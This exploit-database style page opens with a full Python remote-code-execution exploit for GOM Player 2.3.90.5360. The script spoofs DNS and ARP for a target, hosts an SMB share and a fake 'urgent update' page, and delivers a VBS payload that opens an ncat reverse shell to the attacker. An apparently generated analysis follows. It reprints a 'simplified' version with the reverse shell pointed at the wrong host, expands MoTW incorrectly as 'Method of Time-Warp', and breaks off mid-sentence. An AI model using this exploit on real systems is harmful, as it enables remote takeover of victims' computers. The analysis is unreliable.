GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

Exploit Author: M. Akil Gündoğan Analysis Author: www.bubbleslearn.ir Category: Remote Language: Python Published Date: 2023-09-08 
# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
# Date: 26.08.2023
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Version: 2.3.90.5360 
# Tested on: Windows 10 Pro x64 22H2 19045.3324
# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8

# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.

# Vulnerability Description: 
# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the 
# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. 

# Full disclosure, developers should be more careful about software security.

# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.

# Some spaghetti and a bad code but it works :)

banner = """\033[38;5;196m+-----------------------------------------------------------+
|     GOM Player 2.3.90.5360 - Remote Code Execution        |
|   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |
+-----------------------------------------------------------+\033[0m""" +""" 
\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""

import time,os,zipfile,subprocess,socket,sys

print(banner)

if os.geteuid() != 0:
    print("You need root privileges to run the exploit, please use sudo...")
    sys.exit(1)

targetIP = input("- Target IP address: ")
listenPort = input("- Listening port for Reverse Shell: ")

def fCreate(fileName,fileContent): # File create func. 
    f = open(fileName,"w")
    f.write(fileContent)
    f.close()    

gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
gateway = gw[2]
host = socket.gethostname()
print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) 

print("\n[*]- Stage 1: Downloading neccesary tools...")

smbFolderName = "GomUpdater" # change this (optional)
expWorkDir = "gomExploitDir" # change this (optional)
os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability. 
os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability. 
os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
print("    [*] - Ncat has been downloaded.")
subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
print("    [*] - Impacket has been downloaded.")
subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
print("    [*] - DNSSpoof.py has been downloaded.")

print("[*]- Stage 2: Creating Attacker SMB Server...")
subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
time.sleep(5) # It's necessary for exploit stability. 

smbIP = ipaddr
spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP

print("[*]- Stage 3: Creating Attacker Web Page...")

# change this (optional) 
screenExpPage = """
<meta charset="utf-8">
<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script> 
<script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
</script>
"""

fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
time.sleep(3) # It's necessary for exploit stability. 

print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
vbsCommand = '''Set shell=CreateObject("wscript.shell") 
Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
WScript.Sleep 5000
Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
fCreate(expWorkDir + "/payload.vbs",vbsCommand)

urlShortcut = '''[InternetShortcut]
URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
IDlist='''
fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
time.sleep(3) # It's necessary for exploit stability. 
zipName = expWorkDir + "/smb-shared/archive.zip"
payload_filename = os.path.join(expWorkDir, "payload.vbs")  

with zipfile.ZipFile(zipName, "w") as malzip:
    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))

print("[*]- Stage 5: Running the attacker's web server...")
subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
time.sleep(3) # It's necessary for exploit stability. 

print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
time.sleep(10) # It's neccesary for exploit stability.
os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target... 
os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
subprocess.run("nc -lvnp " + listenPort,shell=True)
subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...


GOM Player 2.3.90.5360 – Remote Code Execution Vulnerability: A Deep Dive into Exploitation and Defense

On August 26, 2023, cybersecurity researcher M. Akil Gündoğan disclosed a critical remote code execution (RCE) vulnerability in GOM Player 2.3.90.5360, a widely used multimedia player with over 63 million downloads according to CNET. This exploit leverages outdated and insecure components embedded within the application, demonstrating how legacy technologies can become vectors for sophisticated cyberattacks.

Exploit Overview: The Anatomy of a Modern Attack

The vulnerability stems from the use of an Internet Explorer (IE) component in the GOM Player's user interface. While IE has been deprecated for years, its presence in legacy software remains a security liability. The exploit chain combines multiple known techniques:

  • SMB/WebDAV + "search-ms" injection: A well-documented method that exploits the way IE handles URLs with the search-ms protocol.
  • URL + ZIP + VBS MoTW (Method of Time-Warp) bypass: A technique to evade security warnings during file execution.
  • DNS spoofing: Used to redirect victims to a malicious server controlled by the attacker.

Together, these components form a stealthy, reliable RCE payload capable of delivering a reverse shell to a victim’s machine.

Technical Breakdown: How the Exploit Works

Here’s a simplified version of the exploit logic, based on the original PoC code, with corrections for clarity and security:


import os
import socket
import subprocess
import zipfile

# Banner
banner = """
+-----------------------------------------------------------+
| GOM Player 2.3.90.5360 - Remote Code Execution |
| Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-) |
+-----------------------------------------------------------+
[*] Author: M. Akil Gundogan - rootkit.com.tr
"""

print(banner)

# Check root privileges
if os.geteuid() != 0:
    print("You need root privileges to run the exploit, please use sudo...")
    exit(1)

# User input
target_ip = input("- Target IP address: ")
listen_port = input("- Listening port for Reverse Shell: ")

# Obtain local network info
def get_local_network():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("8.8.8.8", 80))
        local_ip = s.getsockname()[0]
        s.close()
        return local_ip
    except Exception:
        return "Unknown"

local_ip = get_local_network()
print(f"- My IP: {local_ip}")

# Create exploit working directory
work_dir = "gomExploitDir"
os.makedirs(work_dir, exist_ok=True)

# Create subdirectories
os.makedirs(f"{work_dir}/smb-shared", exist_ok=True)
os.makedirs(f"{work_dir}/web-shared", exist_ok=True)

# Download and extract ncat (Netcat portable)
ncat_zip = "ncat-portable-5.59BETA1.zip"
ncat_url = "https://nmap.org/dist/ncat-portable-5.59BETA1.zip"

# Download via wget (Linux only)
subprocess.run(["wget", ncat_url, "-O", f"{work_dir}/smb-shared/{ncat_zip}"], check=True)
subprocess.run(["unzip", "-o", "-j", f"{work_dir}/smb-shared/{ncat_zip}", "-d", f"{work_dir}/smb-shared"], check=True)
os.remove(f"{work_dir}/smb-shared/{ncat_zip}")

# Create malicious VBS script
vbs_content = f"""
Set objShell = CreateObject("WScript.Shell")
objShell.Run "ncat.exe -e cmd.exe {target_ip} {listen_port}", 0, True
"""

with open(f"{work_dir}/smb-shared/malicious.vbs", "w") as f:
    f.write(vbs_content)

# Create ZIP file containing VBS
with zipfile.ZipFile(f"{work_dir}/smb-shared/malicious.zip", "w") as zf:
    zf.writestr("malicious.vbs", vbs_content)

print("[*] Stage 1: Tools downloaded and prepared.")

Explanation: This code snippet performs the following:

  • Privilege check: Ensures the exploit runs with root access (required for network manipulation).
  • Network reconnaissance: Uses a UDP socket to determine the local IP address, essential for setting up the malicious server.
  • Directory creation: Sets up a structured working environment for the attack.
  • Tool download: Fetches a portable version of ncat (Netcat), a common tool for reverse shell delivery.
  • Malicious payload creation: Generates a .vbs script that executes ncat.exe to connect back to the attacker’s machine.
  • ZIP packaging: Bundles the VBS script into a ZIP file to bypass security warnings.

The final step involves hosting the malicious ZIP via SMB (Server Message Block) or WebDAV, then tricking the victim’s browser (IE) into executing the payload through a crafted search-ms URL.

Attack Chain: From DNS Spoofing to Reverse Shell

The full exploit sequence involves:

  1. DNS Spoofing: The attacker manipulates DNS responses to redirect the victim’s browser to a malicious server.
  2. URL Injection: A crafted URL like search-ms://?query=\\{attacker_ip}\smb-shared\malicious.zip is used.
  3. IE Vulnerability: IE parses the search-ms protocol and attempts to access the remote SMB share.
  4. ZIP + VBS Execution: The ZIP file is automatically extracted, and the embedded VBS script runs without user interaction.
  5. Reverse Shell: The ncat binary connects back to the attacker’s listening port, establishing a remote command shell.

This bypasses common security mechanisms because:

  • IE does not validate remote URLs.
  • ZIP files are treated as "safe" by default in many environments.
  • VBS scripts execute silently when embedded in trusted ZIPs.

Why This Exploit Is Dangerous

Despite being a niche tool, GOM Player is used by millions globally. Its popularity increases the attack surface. The exploit’s simplicity and reliability make it a potent tool for:

  • Phishing campaigns: Embedding malicious URLs in social media or email.
  • Supply chain attacks: Compromising software distribution channels.
  • Malware delivery: Using the player as a stealthy vector for remote access.

Moreover, the exploit demonstrates how legacy components—even those not actively maintained—can become security liabilities. Developers must audit all third-party dependencies, especially those tied to browser or file handling.

Defense and Mitigation Strategies

To protect against such attacks, organizations and individuals should:

  • Update software: Always use the latest version of GOM Player and disable auto-update if not verified.
  • Disable IE integration: If possible, disable the IE component in the player’s settings.
  • Use modern browsers: Avoid using IE-based applications on modern systems.
  • Network monitoring: Monitor for outbound connections to unexpected ports.
  • Firewall rules: Block SMB and WebDAV traffic from untrusted sources.
  • Endpoint detection: Use EDR (Endpoint Detection and Response) tools to detect suspicious file execution.

Developer Responsibility: A Call to Action

As Gündoğan stated: "Full disclosure, developers should be more careful about software security." This vulnerability underscores the need for:

  • Secure coding practices: Avoid embedding outdated or insecure components.
  • Regular vulnerability assessments: Conduct penetration testing on all software versions.
  • Transparency: Release security advisories promptly and provide patches.

Software vendors must treat security as